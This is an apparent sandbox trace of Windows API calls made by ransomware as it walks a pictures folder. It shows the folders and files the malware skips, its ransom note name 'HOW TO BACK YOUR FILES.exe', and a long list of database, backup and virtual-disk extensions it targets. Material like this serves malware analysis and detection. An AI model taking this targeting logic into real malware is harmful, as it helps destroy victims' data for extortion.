ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.233] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.233] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.233] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.233] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.233] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.233] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.233] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.233] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.233] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0040.233] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.233] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="aoldtz.exe") returned 1 [0040.233] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".") returned 1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="..") returned 1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="windows") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="bootmgr") returned 1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="temp") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="pagefile.sys") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="boot") returned 1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ids.txt") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ntuser.dat") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="perflogs") returned -1 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="MSBuild") returned -1 [0040.234] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0040.234] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\*") returned 55 [0040.234] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0040.234] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0040.234] lstrlenW (lpString="Ares865") returned 7 [0040.234] lstrcmpiW (lpString1="mum.jpg", lpString2="Ares865") returned 1 [0040.234] lstrlenW (lpString=".dll") returned 4 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".dll") returned 1 [0040.234] lstrlenW (lpString=".lnk") returned 4 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".lnk") returned 1 [0040.234] lstrlenW (lpString=".ini") returned 4 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".ini") returned 1 [0040.234] lstrlenW (lpString=".sys") returned 4 [0040.234] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".sys") returned 1 [0040.234] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0040.234] lstrlenW (lpString="bak") returned 3 [0040.234] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0040.234] lstrlenW (lpString="ba_") returned 3 [0040.234] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0040.234] lstrlenW (lpString="dbb") returned 3 [0040.234] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0040.234] lstrlenW (lpString="vmdk") returned 4 [0040.234] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0040.234] lstrlenW (lpString="rar") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0040.235] lstrlenW (lpString="zip") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0040.235] lstrlenW (lpString="tgz") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0040.235] lstrlenW (lpString="vbox") returned 4 [0040.235] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0040.235] lstrlenW (lpString="vdi") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0040.235] lstrlenW (lpString="vhd") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0040.235] lstrlenW (lpString="vhdx") returned 4 [0040.235] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0040.235] lstrlenW (lpString="avhd") returned 4 [0040.235] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0040.235] lstrlenW (lpString="db") returned 2 [0040.235] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0040.235] lstrlenW (lpString="db2") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0040.235] lstrlenW (lpString="db3") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0040.235] lstrlenW (lpString="dbf") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0040.235] lstrlenW (lpString="mdf") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0040.235] lstrlenW (lpString="mdb") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0040.235] lstrlenW (lpString="sql") returned 3 [0040.235] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0040.235] lstrlenW (lpString="sqlite") returned 6 [0040.235] lstrcmpiW (lpString1="um.jpg", lpString2="sqlite") returned 1 [0040.235] lstrlenW (lpString="sqlite3") returned 7 [0040.235] lstrcmpiW (lpString1="mum.jpg", lpString2="sqlite3") returned -1 [0040.235] lstrlenW (lpString="sqlitedb") returned 8 [0040.235] lstrcmpiW (lpString1="emum.jpg", lpString2="sqlitedb") returned -1 [0040.235] lstrlenW (lpString="xml") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0040.236] lstrlenW (lpString="$er") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0040.236] lstrlenW (lpString="4dd") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0040.236] lstrlenW (lpString="4dl") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0040.236] lstrlenW (lpString="^^^") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0040.236] lstrlenW (lpString="abs") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0040.236] lstrlenW (lpString="abx") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0040.236] lstrlenW (lpString="accdb") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accdb") returned 1 [0040.236] lstrlenW (lpString="accdc") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accdc") returned 1 [0040.236] lstrlenW (lpString="accde") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accde") returned 1 [0040.236] lstrlenW (lpString="accdr") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accdr") returned 1 [0040.236] lstrlenW (lpString="accdt") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accdt") returned 1 [0040.236] lstrlenW (lpString="accdw") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accdw") returned 1 [0040.236] lstrlenW (lpString="accft") returned 5 [0040.236] lstrcmpiW (lpString1="m.jpg", lpString2="accft") returned 1 [0040.236] lstrlenW (lpString="adb") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0040.236] lstrlenW (lpString="adb") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0040.236] lstrlenW (lpString="ade") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0040.236] lstrlenW (lpString="adf") returned 3 [0040.236] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0040.236] lstrlenW (lpString="adn") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0040.237] lstrlenW (lpString="adp") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0040.237] lstrlenW (lpString="alf") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0040.237] lstrlenW (lpString="ask") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0040.237] lstrlenW (lpString="btr") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0040.237] lstrlenW (lpString="cat") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0040.237] lstrlenW (lpString="cdb") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0040.237] lstrlenW (lpString="ckp") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0040.237] lstrlenW (lpString="cma") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0040.237] lstrlenW (lpString="cpd") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0040.237] lstrlenW (lpString="dacpac") returned 6 [0040.237] lstrcmpiW (lpString1="um.jpg", lpString2="dacpac") returned 1 [0040.237] lstrlenW (lpString="dad") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0040.237] lstrlenW (lpString="dadiagrams") returned 10 [0040.237] lstrcmpiW (lpString1="themum.jpg", lpString2="dadiagrams") returned 1 [0040.237] lstrlenW (lpString="daschema") returned 8 [0040.237] lstrcmpiW (lpString1="emum.jpg", lpString2="daschema") returned 1 [0040.237] lstrlenW (lpString="db-journal") returned 10 [0040.237] lstrcmpiW (lpString1="themum.jpg", lpString2="db-journal") returned 1 [0040.237] lstrlenW (lpString="db-shm") returned 6 [0040.237] lstrcmpiW (lpString1="um.jpg", lpString2="db-shm") returned 1 [0040.237] lstrlenW (lpString="db-wal") returned 6 [0040.237] lstrcmpiW (lpString1="um.jpg", lpString2="db-wal") returned 1 [0040.237] lstrlenW (lpString="dbc") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0040.237] lstrlenW (lpString="dbs") returned 3 [0040.237] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0040.238] lstrlenW (lpString="dbt") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0040.238] lstrlenW (lpString="dbv") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0040.238] lstrlenW (lpString="dbx") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0040.238] lstrlenW (lpString="dcb") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0040.238] lstrlenW (lpString="dct") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0040.238] lstrlenW (lpString="dcx") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0040.238] lstrlenW (lpString="ddl") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0040.238] lstrlenW (lpString="dlis") returned 4 [0040.238] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0040.238] lstrlenW (lpString="dp1") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0040.238] lstrlenW (lpString="dqy") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0040.238] lstrlenW (lpString="dsk") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0040.238] lstrlenW (lpString="dsn") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0040.238] lstrlenW (lpString="dtsx") returned 4 [0040.238] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0040.238] lstrlenW (lpString="dxl") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0040.238] lstrlenW (lpString="eco") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0040.238] lstrlenW (lpString="ecx") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0040.238] lstrlenW (lpString="edb") returned 3 [0040.238] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0040.238] lstrlenW (lpString="epim") returned 4 [0040.239] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0040.239] lstrlenW (lpString="fcd") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0040.239] lstrlenW (lpString="fdb") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0040.239] lstrlenW (lpString="fic") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0040.239] lstrlenW (lpString="flexolibrary") returned 12 [0040.239] lstrcmpiW (lpString1="anthemum.jpg", lpString2="flexolibrary") returned -1 [0040.239] lstrlenW (lpString="fm5") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0040.239] lstrlenW (lpString="fmp") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0040.239] lstrlenW (lpString="fmp12") returned 5 [0040.239] lstrcmpiW (lpString1="m.jpg", lpString2="fmp12") returned 1 [0040.239] lstrlenW (lpString="fmpsl") returned 5 [0040.239] lstrcmpiW (lpString1="m.jpg", lpString2="fmpsl") returned 1 [0040.239] lstrlenW (lpString="fol") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0040.239] lstrlenW (lpString="fp3") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0040.239] lstrlenW (lpString="fp4") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0040.239] lstrlenW (lpString="fp5") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0040.239] lstrlenW (lpString="fp7") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0040.239] lstrlenW (lpString="fpt") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0040.239] lstrlenW (lpString="frm") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0040.239] lstrlenW (lpString="gdb") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0040.239] lstrlenW (lpString="gdb") returned 3 [0040.239] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0040.239] lstrlenW (lpString="grdb") returned 4 [0040.239] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0040.240] lstrlenW (lpString="gwi") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0040.240] lstrlenW (lpString="hdb") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0040.240] lstrlenW (lpString="his") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0040.240] lstrlenW (lpString="ib") returned 2 [0040.240] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0040.240] lstrlenW (lpString="idb") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0040.240] lstrlenW (lpString="ihx") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0040.240] lstrlenW (lpString="itdb") returned 4 [0040.240] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0040.240] lstrlenW (lpString="itw") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0040.240] lstrlenW (lpString="jet") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0040.240] lstrlenW (lpString="jtx") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0040.240] lstrlenW (lpString="kdb") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0040.240] lstrlenW (lpString="kexi") returned 4 [0040.240] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0040.240] lstrlenW (lpString="kexic") returned 5 [0040.240] lstrcmpiW (lpString1="m.jpg", lpString2="kexic") returned 1 [0040.240] lstrlenW (lpString="kexis") returned 5 [0040.240] lstrcmpiW (lpString1="m.jpg", lpString2="kexis") returned 1 [0040.240] lstrlenW (lpString="lgc") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0040.240] lstrlenW (lpString="lwx") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0040.240] lstrlenW (lpString="maf") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0040.240] lstrlenW (lpString="maq") returned 3 [0040.240] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0040.240] lstrlenW (lpString="mar") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0040.241] lstrlenW (lpString="marshal") returned 7 [0040.241] lstrcmpiW (lpString1="mum.jpg", lpString2="marshal") returned 1 [0040.241] lstrlenW (lpString="mas") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0040.241] lstrlenW (lpString="mav") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0040.241] lstrlenW (lpString="maw") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0040.241] lstrlenW (lpString="mdbhtml") returned 7 [0040.241] lstrcmpiW (lpString1="mum.jpg", lpString2="mdbhtml") returned 1 [0040.241] lstrlenW (lpString="mdn") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0040.241] lstrlenW (lpString="mdt") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0040.241] lstrlenW (lpString="mfd") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0040.241] lstrlenW (lpString="mpd") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0040.241] lstrlenW (lpString="mrg") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0040.241] lstrlenW (lpString="mud") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0040.241] lstrlenW (lpString="mwb") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0040.241] lstrlenW (lpString="myd") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0040.241] lstrlenW (lpString="ndf") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0040.241] lstrlenW (lpString="nnt") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0040.241] lstrlenW (lpString="nrmlib") returned 6 [0040.241] lstrcmpiW (lpString1="um.jpg", lpString2="nrmlib") returned 1 [0040.241] lstrlenW (lpString="ns2") returned 3 [0040.241] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0040.241] lstrlenW (lpString="ns3") returned 3 [0040.242] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0040.242] lstrlenW (lpString="ns4") returned 3 [0040.242] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0040.242] lstrlenW (lpString="nsf") returned 3 [0040.242] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0040.242] lstrlenW (lpString="nv") returned 2 [0040.242] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0040.242] lstrlenW (lpString="nv2") returned 3 [0040.242] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0040.242] lstrlenW (lpString="nwdb") returned 4 [0040.242] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0040.252] lstrlenW (lpString="nyf") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0040.253] lstrlenW (lpString="odb") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0040.253] lstrlenW (lpString="odb") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0040.253] lstrlenW (lpString="oqy") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0040.253] lstrlenW (lpString="ora") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0040.253] lstrlenW (lpString="orx") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0040.253] lstrlenW (lpString="owc") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0040.253] lstrlenW (lpString="p96") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0040.253] lstrlenW (lpString="p97") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0040.253] lstrlenW (lpString="pan") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0040.253] lstrlenW (lpString="pdb") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0040.253] lstrlenW (lpString="pdm") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0040.253] lstrlenW (lpString="pnz") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0040.253] lstrlenW (lpString="qry") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0040.253] lstrlenW (lpString="qvd") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0040.253] lstrlenW (lpString="rbf") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0040.253] lstrlenW (lpString="rctd") returned 4 [0040.253] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0040.253] lstrlenW (lpString="rod") returned 3 [0040.253] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0040.253] lstrlenW (lpString="rodx") returned 4 [0040.254] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0040.254] lstrlenW (lpString="rpd") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0040.254] lstrlenW (lpString="rsd") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0040.254] lstrlenW (lpString="sas7bdat") returned 8 [0040.254] lstrcmpiW (lpString1="emum.jpg", lpString2="sas7bdat") returned -1 [0040.254] lstrlenW (lpString="sbf") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0040.254] lstrlenW (lpString="scx") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0040.254] lstrlenW (lpString="sdb") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0040.254] lstrlenW (lpString="sdc") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0040.254] lstrlenW (lpString="sdf") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0040.254] lstrlenW (lpString="sis") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0040.254] lstrlenW (lpString="spq") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0040.254] lstrlenW (lpString="te") returned 2 [0040.254] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0040.254] lstrlenW (lpString="teacher") returned 7 [0040.254] lstrcmpiW (lpString1="mum.jpg", lpString2="teacher") returned -1 [0040.254] lstrlenW (lpString="tmd") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0040.254] lstrlenW (lpString="tps") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0040.254] lstrlenW (lpString="trc") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0040.254] lstrlenW (lpString="trc") returned 3 [0040.254] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0040.254] lstrlenW (lpString="trm") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0040.255] lstrlenW (lpString="udb") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0040.255] lstrlenW (lpString="udl") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0040.255] lstrlenW (lpString="usr") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0040.255] lstrlenW (lpString="v12") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0040.255] lstrlenW (lpString="vis") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0040.255] lstrlenW (lpString="vpd") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0040.255] lstrlenW (lpString="vvv") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0040.255] lstrlenW (lpString="wdb") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0040.255] lstrlenW (lpString="wmdb") returned 4 [0040.255] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0040.255] lstrlenW (lpString="wrk") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0040.255] lstrlenW (lpString="xdb") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0040.255] lstrlenW (lpString="xld") returned 3 [0040.255] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0040.255] lstrlenW (lpString="xmlff") returned 5 [0040.255] lstrcmpiW (lpString1="m.jpg", lpString2="xmlff") returned -1 [0040.255] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2="aoldtz.exe") returned 1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2=".") returned 1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2="..") returned 1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2="windows") returned -1 [0040.255] lstrcmpiW (lpString1="Desert.jpg", lpString2="bootmgr") returned 1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="temp") returned -1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="pagefile.sys") returned -1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="boot") returned 1 [0040.256] lstrcmpiW 